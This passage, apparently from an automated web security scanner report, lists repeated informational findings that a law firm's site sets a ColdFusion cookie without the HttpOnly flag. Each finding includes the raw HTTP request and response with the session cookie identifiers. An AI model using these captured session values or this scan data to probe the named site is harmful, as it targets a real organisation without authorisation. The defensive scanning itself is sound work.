Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.46. http://www.fulbright.com/Beijing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Beijing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Beijing HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A47%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1944%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:47 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.47. http://www.fulbright.com/Dallas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Dallas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Dallas HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1950%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.48. http://www.fulbright.com/Denver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Denver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Denver HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.49. http://www.fulbright.com/FAA_adv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /FAA_adv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAA_adv HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D888%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:50:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.50. http://www.fulbright.com/HongKong  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /HongKong

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HongKong HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2092%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.51. http://www.fulbright.com/London  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /London

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /London HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.52. http://www.fulbright.com/LosAngeles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /LosAngeles

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LosAngeles HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.53. http://www.fulbright.com/Minneapolis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Minneapolis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Minneapolis HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.54. http://www.fulbright.com/Munich  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Munich

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Munich HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:55:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2338%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.55. http://www.fulbright.com/Riyadh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Riyadh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Riyadh HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:56:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.56. http://www.fulbright.com/SanAntonio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /SanAntonio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SanAntonio HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:56:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2763%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:56:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.57. http://www.fulbright.com/StLouis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /StLouis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StLouis HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:57:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A57%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2807%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:57:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.58. http://www.fulbright.com/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /aboutus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.59. http://www.fulbright.com/alumni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /alumni

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.60. http://www.fulbright.com/aop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /aop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aop HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.61. http://www.fulbright.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /careers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 19 Jan 2011 15:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/
location: http://www.joinfulbright.com
Content-Type: text/html; charset=UTF-8


           

10.62. http://www.fulbright.com/dc/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /dc/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dc/x22 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
